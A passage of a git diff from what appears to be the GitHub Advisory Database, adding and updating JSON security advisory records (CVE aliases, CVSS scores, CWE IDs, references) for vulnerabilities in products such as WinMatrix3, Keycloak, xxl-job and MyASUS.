"2025-07-21T09:33:26Z", "published": "2025-07-21T06:31:19Z", "aliases": [ "CVE-2025-7918" ], "details": "WinMatrix3 Web package developed by Simopro Technology has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/07/GHSA-h7h2-hvvx-9pw7/GHSA-h7h2-hvvx-9pw7.json b/advisories/unreviewed/2025/07/GHSA-h7h2-hvvx-9pw7/GHSA-h7h2-hvvx-9pw7.json new file mode 100644 index 0000000000000..47f5a4d8b0f93 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h7h2-hvvx-9pw7/GHSA-h7h2-hvvx-9pw7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7h2-hvvx-9pw7", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-7343" + ], + "details": "The SFT developed by Digiwin has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7343" + }, + { + "type": "WEB", + "url": "https://www.digiwin.com/tw/news/3568.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10271-25ea9-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10270-83d95-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j8hp-g4wv-c9xj/GHSA-j8hp-g4wv-c9xj.json b/advisories/unreviewed/2025/07/GHSA-j8hp-g4wv-c9xj/GHSA-j8hp-g4wv-c9xj.json new file mode 100644 index 0000000000000..0693e2b60a7eb --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j8hp-g4wv-c9xj/GHSA-j8hp-g4wv-c9xj.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8hp-g4wv-c9xj", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-24937" + ], + "details": "File contents could be read from the local file system by an attacker. Additionally, malicious code could be inserted in the file, leading to a full compromise of the web application and the container it is running on.\n\nThe vulnerable component is bound to the network stack and the set of possible attackers extends up to and including the entire Internet. The web application allows arbitrary files to be included in a file that was downloadable and executable by the web server.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24937" + }, + { + "type": "WEB", + "url": "https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2025-24937" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jxj8-fmv2-mqm5/GHSA-jxj8-fmv2-mqm5.json b/advisories/unreviewed/2025/07/GHSA-jxj8-fmv2-mqm5/GHSA-jxj8-fmv2-mqm5.json index 29aaa4d9cee0c..d460635773610 100644 --- a/advisories/unreviewed/2025/07/GHSA-jxj8-fmv2-mqm5/GHSA-jxj8-fmv2-mqm5.json +++ b/advisories/unreviewed/2025/07/GHSA-jxj8-fmv2-mqm5/GHSA-jxj8-fmv2-mqm5.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jxj8-fmv2-mqm5", - "modified": "2025-07-21T06:31:19Z", + "modified": "2025-07-21T09:33:26Z", "published": "2025-07-21T06:31:19Z", "aliases": [ "CVE-2025-7917" ], "details": "WinMatrix3 Web package developed by Simopro Technology has an Arbitrary File Upload vulnerability, allowing remote attackers with administrator privileges to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/07/GHSA-mgfp-cfcp-654m/GHSA-mgfp-cfcp-654m.json b/advisories/unreviewed/2025/07/GHSA-mgfp-cfcp-654m/GHSA-mgfp-cfcp-654m.json new file mode 100644 index 0000000000000..ab23cef0559c3 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mgfp-cfcp-654m/GHSA-mgfp-cfcp-654m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mgfp-cfcp-654m", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-0664" + ], + "details": "A locally authenticated, privileged user can craft a malicious OpenSSL configuration file, potentially leading the agent to load an arbitrary local library. This may impair endpoint defenses and allow the attacker to achieve code execution with SYSTEM-level privileges.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:D/RE:L/U:Green" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0664" + }, + { + "type": "WEB", + "url": "https://thrive.trellix.com/s/article/000014450" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q2pr-mc98-24cv/GHSA-q2pr-mc98-24cv.json b/advisories/unreviewed/2025/07/GHSA-q2pr-mc98-24cv/GHSA-q2pr-mc98-24cv.json new file mode 100644 index 0000000000000..ba7620e2995a6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q2pr-mc98-24cv/GHSA-q2pr-mc98-24cv.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2pr-mc98-24cv", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-4049" + ], + "details": "Use of hard-coded, the same among all vulnerable installations SQLite credentials vulnerability in SIGNUM-NET FARA allows to read and manipulate local-stored database.This issue affects FARA: through 5.0.80.34.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4049" + }, + { + "type": "WEB", + "url": "https://cert.pl/en/posts/2025/07/CVE-2025-4049" + }, + { + "type": "WEB", + "url": "https://fara.pl" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T08:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r7rh-8pmr-qq23/GHSA-r7rh-8pmr-qq23.json b/advisories/unreviewed/2025/07/GHSA-r7rh-8pmr-qq23/GHSA-r7rh-8pmr-qq23.json new file mode 100644 index 0000000000000..980cede6e767c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-r7rh-8pmr-qq23/GHSA-r7rh-8pmr-qq23.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7rh-8pmr-qq23", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-7921" + ], + "details": "Certain modem models developed by Askey has a Stack-based Buffer Overflow vulnerability, allowing unauthenticated remote attackers to control the program's execution flow and potentially execute arbitrary code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7921" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10269-c9839-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10268-1583b-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rj69-p564-922p/GHSA-rj69-p564-922p.json b/advisories/unreviewed/2025/07/GHSA-rj69-p564-922p/GHSA-rj69-p564-922p.json new file mode 100644 index 0000000000000..630ce334d44b4 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rj69-p564-922p/GHSA-rj69-p564-922p.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj69-p564-922p", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-24938" + ], + "details": "The web application allows user input to pass unfiltered to a command executed on the underlying operating system. An attacker with high privileged access (administrator) to the application has the potential execute commands on the operating system under the context of the webserver.\n\nThe vulnerable component is bound to the network stack and the set of possible attackers extends up to and including the entire Internet. Has the potential to inject command while creating a new User from User Management.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24938" + }, + { + "type": "WEB", + "url": "https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2025-24938" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-v869-2g6q-4fwq/GHSA-v869-2g6q-4fwq.json b/advisories/unreviewed/2025/07/GHSA-v869-2g6q-4fwq/GHSA-v869-2g6q-4fwq.json new file mode 100644 index 0000000000000..5583f39317418 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v869-2g6q-4fwq/GHSA-v869-2g6q-4fwq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v869-2g6q-4fwq", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-7920" + ], + "details": "WinMatrix3 Web package developed by Simopro Technology has a Reflected Cross-site Scripting vulnerability, allowing unauthenticated remote attackers to execute arbitrary JavaScript codes in user's browser through phishing attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7920" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10267-775be-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10262-2fcb6-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T07:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-w362-42cv-6j7v/GHSA-w362-42cv-6j7v.json b/advisories/unreviewed/2025/07/GHSA-w362-42cv-6j7v/GHSA-w362-42cv-6j7v.json new file mode 100644 index 0000000000000..e09bdd263b894 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-w362-42cv-6j7v/GHSA-w362-42cv-6j7v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w362-42cv-6j7v", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-4569" + ], + "details": "An insecure sensitive key storage issue was found in MyASUS. potentially allowing unauthorized actor to obtain a token that could be used to communicate with certain services.\n\n\nRefer to the 'Security Update for for MyASUS' section on the ASUS Security Advisory for more information.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4569" + }, + { + "type": "WEB", + "url": "https://www.asus.com/content/asus-product-security-advisory" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T08:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-x75p-289f-65mx/GHSA-x75p-289f-65mx.json b/advisories/unreviewed/2025/07/GHSA-x75p-289f-65mx/GHSA-x75p-289f-65mx.json new file mode 100644 index 0000000000000..11b92b280e4ba --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-x75p-289f-65mx/GHSA-x75p-289f-65mx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x75p-289f-65mx", + "modified": "2025-07-21T09:33:26Z", + "published": "2025-07-21T09:33:26Z", + "aliases": [ + "CVE-2025-4570" + ], + "details": "An insecure sensitive key storage issue was found in MyASUS. potentially allowing unauthorized actor to obtain a token that could be used to communicate with certain services.\n\n\nRefer to the 'Security Update for for MyASUS' section on the ASUS Security Advisory for more information.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4570" + }, + { + "type": "WEB", + "url": "https://www.asus.com/content/asus-product-security-advisory" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T08:15:24Z" + } +} \ No newline at end of file From 944edb607d6279f9025d8168c29464465cab2ab1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 12:27:44 +0000 Subject: [PATCH 045/323] Publish Advisories GHSA-83j7-mhw9-388w GHSA-f8vw-8vgh-22r9 GHSA-83j7-mhw9-388w --- .../GHSA-83j7-mhw9-388w.json | 73 +++++++++++++++++++ .../GHSA-f8vw-8vgh-22r9.json | 35 +++++++-- .../GHSA-83j7-mhw9-388w.json | 40 ---------- 3 files changed, 103 insertions(+), 45 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-83j7-mhw9-388w/GHSA-83j7-mhw9-388w.json rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-f8vw-8vgh-22r9/GHSA-f8vw-8vgh-22r9.json (69%) delete mode 100644 advisories/unreviewed/2025/07/GHSA-83j7-mhw9-388w/GHSA-83j7-mhw9-388w.json diff --git a/advisories/github-reviewed/2025/07/GHSA-83j7-mhw9-388w/GHSA-83j7-mhw9-388w.json b/advisories/github-reviewed/2025/07/GHSA-83j7-mhw9-388w/GHSA-83j7-mhw9-388w.json new file mode 100644 index 0000000000000..39676c63de51f --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-83j7-mhw9-388w/GHSA-83j7-mhw9-388w.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83j7-mhw9-388w", + "modified": "2025-07-21T12:26:17Z", + "published": "2025-07-18T15:31:57Z", + "aliases": [ + "CVE-2025-7784" + ], + "summary": "Keycloak is vulnerable to bad actors escalating privileges through its Fine-Grained Admin Permissions", + "details": "A flaw was found in the Keycloak identity and access management system when Fine-Grained Admin Permissions (FGAPv2) are enabled. An administrative user with the manage-users role can escalate their privileges to realm-admin due to improper privilege enforcement. This vulnerability allows unauthorized elevation of access rights, compromising the intended separation of administrative duties and posing a security risk to the realm.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.keycloak:keycloak-services" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "26.3.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7784" + }, + { + "type": "WEB", + "url": "https://github.com/keycloak/keycloak/issues/41137" + }, + { + "type": "WEB", + "url": "https://github.com/keycloak/keycloak/pull/41168" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-7784" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2381861" + }, + { + "type": "PACKAGE", + "url": "https://github.com/keycloak/keycloak" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-21T12:26:17Z", + "nvd_published_at": "2025-07-18T14:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f8vw-8vgh-22r9/GHSA-f8vw-8vgh-22r9.json b/advisories/github-reviewed/2025/07/GHSA-f8vw-8vgh-22r9/GHSA-f8vw-8vgh-22r9.json similarity index 69% rename from advisories/unreviewed/2025/07/GHSA-f8vw-8vgh-22r9/GHSA-f8vw-8vgh-22r9.json rename to advisories/github-reviewed/2025/07/GHSA-f8vw-8vgh-22r9/GHSA-f8vw-8vgh-22r9.json index a61d87c30b365..9b337773cd7bc 100644 --- a/advisories/unreviewed/2025/07/GHSA-f8vw-8vgh-22r9/GHSA-f8vw-8vgh-22r9.json +++ b/advisories/github-reviewed/2025/07/GHSA-f8vw-8vgh-22r9/GHSA-f8vw-8vgh-22r9.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-f8vw-8vgh-22r9", - "modified": "2025-07-18T15:31:57Z", + "modified": "2025-07-21T12:26:33Z", "published": "2025-07-18T15:31:57Z", "aliases": [ "CVE-2025-7787" ], + "summary": "XXL-JOB is vulnerable to SSRF attacks", "details": "A vulnerability, which was classified as critical, was found in Xuxueli xxl-job up to 3.1.1. Affected is the function httpJobHandler of the file src\\main\\java\\com\\xxl\\job\\executor\\service\\jobhandler\\SampleXxlJob.java. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", "severity": [ { @@ -17,7 +18,27 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.xuxueli:xxl-job-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.1.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -27,6 +48,10 @@ "type": "WEB", "url": "https://github.com/xuxueli/xxl-job/issues/3749" }, + { + "type": "PACKAGE", + "url": "https://github.com/xuxueli/xxl-job" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.316848" @@ -44,9 +69,9 @@ "cwe_ids": [ "CWE-918" ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2025-07-21T12:26:33Z", "nvd_published_at": "2025-07-18T15:15:31Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-83j7-mhw9-388w/GHSA-83j7-mhw9-388w.json b/advisories/unreviewed/2025/07/GHSA-83j7-mhw9-388w/GHSA-83j7-mhw9-388w.json deleted file mode 100644 index 3d488e9833357..0000000000000 --- a/advisories/unreviewed/2025/07/GHSA-83j7-mhw9-388w/GHSA-83j7-mhw9-388w.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-83j7-mhw9-388w", - "modified": "2025-07-18T15:31:57Z", - "published": "2025-07-18T15:31:57Z", - "aliases": [ - "CVE-2025-7784" - ], - "details": "A flaw was found in the Keycloak identity and access management system when Fine-Grained Admin Permissions(FGAPv2) are enabled. An administrative user with the manage-users role can escalate their privileges to realm-admin due to improper privilege enforcement. This vulnerability allows unauthorized elevation of access rights, compromising the intended separation of administrative duties and posing a security risk to the realm.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7784" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2025-7784" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2381861" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-269" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-07-18T14:15:26Z" - } -} \ No newline at end of file From 7add94ecf8e64fbd6cf5c3c45aee707818815582 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 12:32:15 +0000 Subject: [PATCH 046/323] Publish Advisories GHSA-2vx3-x6q5-g22g GHSA-3gv5-8xmr-r4c8 GHSA-4v7v-9hh5-q3vp GHSA-83ch-3237-6753 GHSA-933j-wmw8-7chh GHSA-964f-6xc7-ggjr GHSA-9c9x-54g4-9pfx GHSA-9hj4-m545-52ww GHSA-fvh4-7pmw-84hm GHSA-jq2c-m8gg-mqcm GHSA-m9qp-cg35-56g5 GHSA-q967-6vc6-rqr5 GHSA-vx6m-h78h-xxcf GHSA-w362-42cv-6j7v GHSA-wh93-h96v-jpg3 GHSA-x75p-289f-65mx GHSA-xg9p-p463-3qjp --- .../GHSA-2vx3-x6q5-g22g.json | 36 +++++++++++ .../GHSA-3gv5-8xmr-r4c8.json | 36 +++++++++++ .../GHSA-4v7v-9hh5-q3vp.json | 36 +++++++++++ .../GHSA-83ch-3237-6753.json | 36 +++++++++++ .../GHSA-933j-wmw8-7chh.json | 36 +++++++++++ .../GHSA-964f-6xc7-ggjr.json | 36 +++++++++++ .../GHSA-9c9x-54g4-9pfx.json | 36 +++++++++++ .../GHSA-9hj4-m545-52ww.json | 36 +++++++++++ .../GHSA-fvh4-7pmw-84hm.json | 36 +++++++++++ .../GHSA-jq2c-m8gg-mqcm.json | 31 ++++++++++ .../GHSA-m9qp-cg35-56g5.json | 60 +++++++++++++++++++ .../GHSA-q967-6vc6-rqr5.json | 36 +++++++++++ .../GHSA-vx6m-h78h-xxcf.json | 36 +++++++++++ .../GHSA-w362-42cv-6j7v.json | 6 +- .../GHSA-wh93-h96v-jpg3.json | 36 +++++++++++ .../GHSA-x75p-289f-65mx.json | 6 +- .../GHSA-xg9p-p463-3qjp.json | 31 ++++++++++ 17 files changed, 564 insertions(+), 2 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-2vx3-x6q5-g22g/GHSA-2vx3-x6q5-g22g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3gv5-8xmr-r4c8/GHSA-3gv5-8xmr-r4c8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4v7v-9hh5-q3vp/GHSA-4v7v-9hh5-q3vp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-83ch-3237-6753/GHSA-83ch-3237-6753.json create mode 100644 advisories/unreviewed/2025/07/GHSA-933j-wmw8-7chh/GHSA-933j-wmw8-7chh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-964f-6xc7-ggjr/GHSA-964f-6xc7-ggjr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9c9x-54g4-9pfx/GHSA-9c9x-54g4-9pfx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9hj4-m545-52ww/GHSA-9hj4-m545-52ww.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fvh4-7pmw-84hm/GHSA-fvh4-7pmw-84hm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jq2c-m8gg-mqcm/GHSA-jq2c-m8gg-mqcm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-m9qp-cg35-56g5/GHSA-m9qp-cg35-56g5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q967-6vc6-rqr5/GHSA-q967-6vc6-rqr5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vx6m-h78h-xxcf/GHSA-vx6m-h78h-xxcf.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wh93-h96v-jpg3/GHSA-wh93-h96v-jpg3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xg9p-p463-3qjp/GHSA-xg9p-p463-3qjp.json diff --git a/advisories/unreviewed/2025/07/GHSA-2vx3-x6q5-g22g/GHSA-2vx3-x6q5-g22g.json b/advisories/unreviewed/2025/07/GHSA-2vx3-x6q5-g22g/GHSA-2vx3-x6q5-g22g.json new file mode 100644 index 0000000000000..f04850fe30353 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2vx3-x6q5-g22g/GHSA-2vx3-x6q5-g22g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2vx3-x6q5-g22g", + "modified": "2025-07-21T12:30:33Z", + "published": "2025-07-21T12:30:33Z", + "aliases": [ + "CVE-2025-41681" + ], + "details": "A high privileged remote attacker can gain persistent XSS via POST requests due to improper neutralization of special elements used to create dynamic content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41681" + }, + { + "type": "WEB", + "url": "https://certvde.com/de/advisories/VDE-2025-058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T10:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3gv5-8xmr-r4c8/GHSA-3gv5-8xmr-r4c8.json b/advisories/unreviewed/2025/07/GHSA-3gv5-8xmr-r4c8/GHSA-3gv5-8xmr-r4c8.json new file mode 100644 index 0000000000000..914433eaaf3f5 --- /dev/null +++ 